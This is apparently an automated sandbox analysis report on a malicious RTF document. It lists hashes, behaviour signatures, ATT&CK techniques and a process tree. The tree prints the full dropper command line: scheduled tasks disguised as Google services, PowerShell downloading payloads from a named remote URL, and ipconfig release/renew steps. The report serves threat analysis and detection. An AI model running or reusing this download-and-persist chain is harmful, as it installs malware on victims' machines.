d298f6741d1e6df0f9201d86e9bc89c29f0f37e3c437498f3f5471a56ad80fa0

Analysis

max time kernel
121s
max time network
126s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
20-09-2024 02:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eca7e438ad10709a7f1816a406023a61_JaffaCakes118.rtf
Size

1.6MB
MD5

eca7e438ad10709a7f1816a406023a61
SHA1

caed3687be32d80134c4efb1e0ed2e5c0d018cb7
SHA256

d298f6741d1e6df0f9201d86e9bc89c29f0f37e3c437498f3f5471a56ad80fa0
SHA512

7780daa4f8bd3c7fe985018c05e0fa9d38bb4787e40e2652d351393a0b3367447b46e29ec02e92caf554bb96e906ff1e9d805efa2b02caffafecd52b29ac1cb0
SSDEEP

12288:J/Z2/ZX/ZY/ZZ/ZC/ZD/ZU/ZF/Zv/Z3/Zs/Z1/Zq/ZT/ZI/ZB/Zm/ZZ/Ze/Z0/Zc:HqBQ3elEbJhMrWVgP63ikZuTl

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://120842333-887063928606937956.preview.editmysite.com/uploads/1/2/0/8/120842333/itr.docx

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://120842333-887063928606937956.preview.editmysite.com/uploads/1/2/0/8/120842333/itr2.docx

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2892	2396	cmd.exe	EXCEL.EXE

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

5 1840 powershell.exe
6 1840 powershell.exe
8 576 powershell.exe
9 576 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

1840 powershell.exe
576 powershell.exe
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

flow	pid	process
5	1840	powershell.exe
6	1840	powershell.exe
8	576	powershell.exe
9	576	powershell.exe

pid	process
1840	powershell.exe
576	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

ipconfig.exeipconfig.exeschtasks.exeEXCEL.EXEschtasks.exePING.EXEschtasks.exePING.EXEPING.EXEWINWORD.EXEtaskkill.exeipconfig.exePING.EXEPING.EXEPING.EXEEXCEL.EXEipconfig.execmd.exePING.EXEPING.EXEpowershell.exePING.EXEpowershell.exeschtasks.exetaskkill.exePING.EXEPING.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 11 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

1016 PING.EXE
1700 PING.EXE
2400 PING.EXE
2836 PING.EXE
892 PING.EXE
2036 PING.EXE
2220 PING.EXE
1112 PING.EXE
2132 PING.EXE
2016 PING.EXE
996 PING.EXE
Office loads VBA resources, possible macro or embedded object present

pid	process
1016	PING.EXE
1700	PING.EXE
2400	PING.EXE
2836	PING.EXE
892	PING.EXE
2036	PING.EXE
2220	PING.EXE
1112	PING.EXE
2132	PING.EXE
2016	PING.EXE
996	PING.EXE

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXEEXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Gathers network information 2 TTPs 4 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exe

pid process

1628 ipconfig.exe
1080 ipconfig.exe
1548 ipconfig.exe
1644 ipconfig.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2612 taskkill.exe
2712 taskkill.exe
Runs ping.exe 1 TTPs 11 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

996 PING.EXE
2220 PING.EXE
1016 PING.EXE
2016 PING.EXE
1112 PING.EXE
2132 PING.EXE
1700 PING.EXE
2400 PING.EXE
2836 PING.EXE
892 PING.EXE
2036 PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

2972 schtasks.exe
1556 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

2172 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

1840 powershell.exe
576 powershell.exe

pid	process
1628	ipconfig.exe
1080	ipconfig.exe
1548	ipconfig.exe
1644	ipconfig.exe

pid	process
2612	taskkill.exe
2712	taskkill.exe

pid	process
996	PING.EXE
2220	PING.EXE
1016	PING.EXE
2016	PING.EXE
1112	PING.EXE
2132	PING.EXE
1700	PING.EXE
2400	PING.EXE
2836	PING.EXE
892	PING.EXE
2036	PING.EXE

pid	process
2972	schtasks.exe
1556	schtasks.exe

pid	process
2172	WINWORD.EXE

pid	process
1840	powershell.exe
576	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

taskkill.exetaskkill.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2612	taskkill.exe
Token: SeDebugPrivilege	2712	taskkill.exe
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeDebugPrivilege	576	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

WINWORD.EXEEXCEL.EXEEXCEL.EXE

pid process

2172 WINWORD.EXE
2172 WINWORD.EXE
2396 EXCEL.EXE
2644 EXCEL.EXE

pid	process
2172	WINWORD.EXE
2172	WINWORD.EXE
2396	EXCEL.EXE
2644	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

EXCEL.EXEcmd.exe

description	pid	process	target process
PID 2396 wrote to memory of 2892	2396	EXCEL.EXE	cmd.exe
PID 2396 wrote to memory of 2892	2396	EXCEL.EXE	cmd.exe
PID 2396 wrote to memory of 2892	2396	EXCEL.EXE	cmd.exe
PID 2396 wrote to memory of 2892	2396	EXCEL.EXE	cmd.exe
PID 2892 wrote to memory of 2612	2892	cmd.exe	taskkill.exe
PID 2892 wrote to memory of 2612	2892	cmd.exe	taskkill.exe
PID 2892 wrote to memory of 2612	2892	cmd.exe	taskkill.exe
PID 2892 wrote to memory of 2612	2892	cmd.exe	taskkill.exe
PID 2892 wrote to memory of 2712	2892	cmd.exe	taskkill.exe
PID 2892 wrote to memory of 2712	2892	cmd.exe	taskkill.exe
PID 2892 wrote to memory of 2712	2892	cmd.exe	taskkill.exe
PID 2892 wrote to memory of 2712	2892	cmd.exe	taskkill.exe
PID 2892 wrote to memory of 2836	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 2836	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 2836	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 2836	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 2972	2892	cmd.exe	schtasks.exe
PID 2892 wrote to memory of 2972	2892	cmd.exe	schtasks.exe
PID 2892 wrote to memory of 2972	2892	cmd.exe	schtasks.exe
PID 2892 wrote to memory of 2972	2892	cmd.exe	schtasks.exe
PID 2892 wrote to memory of 892	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 892	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 892	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 892	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 1556	2892	cmd.exe	schtasks.exe
PID 2892 wrote to memory of 1556	2892	cmd.exe	schtasks.exe
PID 2892 wrote to memory of 1556	2892	cmd.exe	schtasks.exe
PID 2892 wrote to memory of 1556	2892	cmd.exe	schtasks.exe
PID 2892 wrote to memory of 2036	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 2036	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 2036	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 2036	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 1840	2892	cmd.exe	powershell.exe
PID 2892 wrote to memory of 1840	2892	cmd.exe	powershell.exe
PID 2892 wrote to memory of 1840	2892	cmd.exe	powershell.exe
PID 2892 wrote to memory of 1840	2892	cmd.exe	powershell.exe
PID 2892 wrote to memory of 2220	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 2220	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 2220	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 2220	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 576	2892	cmd.exe	powershell.exe
PID 2892 wrote to memory of 576	2892	cmd.exe	powershell.exe
PID 2892 wrote to memory of 576	2892	cmd.exe	powershell.exe
PID 2892 wrote to memory of 576	2892	cmd.exe	powershell.exe
PID 2892 wrote to memory of 1112	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 1112	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 1112	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 1112	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 1628	2892	cmd.exe	ipconfig.exe
PID 2892 wrote to memory of 1628	2892	cmd.exe	ipconfig.exe
PID 2892 wrote to memory of 1628	2892	cmd.exe	ipconfig.exe
PID 2892 wrote to memory of 1628	2892	cmd.exe	ipconfig.exe
PID 2892 wrote to memory of 2132	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 2132	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 2132	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 2132	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 1080	2892	cmd.exe	ipconfig.exe
PID 2892 wrote to memory of 1080	2892	cmd.exe	ipconfig.exe
PID 2892 wrote to memory of 1080	2892	cmd.exe	ipconfig.exe
PID 2892 wrote to memory of 1080	2892	cmd.exe	ipconfig.exe
PID 2892 wrote to memory of 1016	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 1016	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 1016	2892	cmd.exe	PING.EXE
PID 2892 wrote to memory of 1016	2892	cmd.exe	PING.EXE

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eca7e438ad10709a7f1816a406023a61_JaffaCakes118.rtf"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2172

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2396
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "taskkill /f /im winword.exe & taskkill /f /im excel.exe & ping -n 3 localhost & schtasks /create /tn "GoogleTasksChromeServ4" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\GoogleTasksChromeServ4.js" /sc minute /mo 3 /f & ping -n 3 localhost & schtasks /create /tn "ServicesGoogleTasks4" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\ServicesGoogleTasks4.exe" /sc minute /mo 3 /f & ping -n 3 localhost & PowerShell (New-Object System.Net.WebClient).DownloadFile(“https://120842333-887063928606937956.preview.editmysite.com/uploads/1/2/0/8/120842333/itr.docx”, “%AppData%\\Microsoft\\GoogleTasksChromeServ4.js”) & ping -n 3 localhost & PowerShell (New-Object System.Net.WebClient).DownloadFile(“https://120842333-887063928606937956.preview.editmysite.com/uploads/1/2/0/8/120842333/itr2.docx”, “%AppData%\\Microsoft\\ServicesGoogleTasks4.exe”) & ping -n 3 localhost & ipconfig/release & ping -n 3 localhost & ipconfig/release & ping -n 3 localhost & ipconfig/release & ping -n 3 localhost & schtasks /run /tn "ServicesGoogleTasks4" & ping -n 3 localhost & schtasks /run /tn "GoogleTasksChromeServ4" & ping -n 60 localhost & ipconfig/renew & ping -n 3 localhost & exit"
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2892
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im winword.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2612
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im excel.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2712
- - C:\Windows\SysWOW64\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2836
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn "GoogleTasksChromeServ4" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\GoogleTasksChromeServ4.js" /sc minute /mo 3 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2972
- - C:\Windows\SysWOW64\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:892
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn "ServicesGoogleTasks4" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\ServicesGoogleTasks4.exe" /sc minute /mo 3 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1556
- - C:\Windows\SysWOW64\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2036
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PowerShell (New-Object System.Net.WebClient).DownloadFile(“https://120842333-887063928606937956.preview.editmysite.com/uploads/1/2/0/8/120842333/itr.docx”, “C:\Users\Admin\AppData\Roaming\\Microsoft\\GoogleTasksChromeServ4.js”)
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1840
- - C:\Windows\SysWOW64\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2220
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PowerShell (New-Object System.Net.WebClient).DownloadFile(“https://120842333-887063928606937956.preview.editmysite.com/uploads/1/2/0/8/120842333/itr2.docx”, “C:\Users\Admin\AppData\Roaming\\Microsoft\\ServicesGoogleTasks4.exe”)
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:576
- - C:\Windows\SysWOW64\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1112
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /release
    3⤵
    - System Location Discovery: System Language Discovery
    - Gathers network information
    PID:1628
- - C:\Windows\SysWOW64\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2132
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /release
    3⤵
    - System Location Discovery: System Language Discovery
    - Gathers network information
    PID:1080
- - C:\Windows\SysWOW64\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1016
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /release
    3⤵
    - System Location Discovery: System Language Discovery
    - Gathers network information
    PID:1548
- - C:\Windows\SysWOW64\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2016
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /tn "ServicesGoogleTasks4"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2328
- - C:\Windows\SysWOW64\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:996
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /tn "GoogleTasksChromeServ4"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1780
- - C:\Windows\SysWOW64\PING.EXE
    ping -n 60 localhost
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1700
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /renew
    3⤵
    - System Location Discovery: System Language Discovery
    - Gathers network information
    PID:1644
- - C:\Windows\SysWOW64\PING.EXE
    ping -n 3 localhost
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2400

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:2644

C:\Windows\system32\taskeng.exe
taskeng.exe {0B2D7F17-3625-4441-93FE-1F45487669E9} S-1-5-21-3434294380-2554721341-1919518612-1000:ELZYPTFV\Admin:Interactive:[1]
1⤵
PID:1464

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
96574dfc1c04aebe77383c47b902cb8b

SHA1
8ade2375d2ef493a7f19966f3242d670f39bba40

SHA256
31f0c6b89781cd90b15b8fb0dfacd3fe69d06b21b7fc545b4aad886ed93aa7da

SHA512
59277fa3eca71d92f91bfcacb0d66e64fbd6971c7d0a4d938758ba486cb03d08bb009cd771bfdc7de92c037c766e5778fe5c0b6986d6cdf93789ce2308c02735

Download Submit
memory/2172-0-0x000000002F1D1000-0x000000002F1D2000-memory.dmp

Filesize
4KB

Download
memory/2172-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2172-2-0x000000007185D000-0x0000000071868000-memory.dmp

Filesize
44KB

Download
memory/2172-67-0x000000007185D000-0x0000000071868000-memory.dmp

Filesize
44KB

Download
memory/2396-7-0x000000007185D000-0x0000000071868000-memory.dmp

Filesize
44KB

Download
memory/2396-51-0x00000000062F0000-0x00000000063F0000-memory.dmp

Filesize
1024KB

Download
memory/2396-23-0x00000000062F0000-0x00000000063F0000-memory.dmp

Filesize
1024KB

Download
memory/2396-62-0x00000000062F0000-0x00000000063F0000-memory.dmp

Filesize
1024KB

Download
memory/2396-63-0x00000000062F0000-0x00000000063F0000-memory.dmp

Filesize
1024KB

Download
memory/2396-64-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2396-66-0x000000007185D000-0x0000000071868000-memory.dmp

Filesize
44KB

Download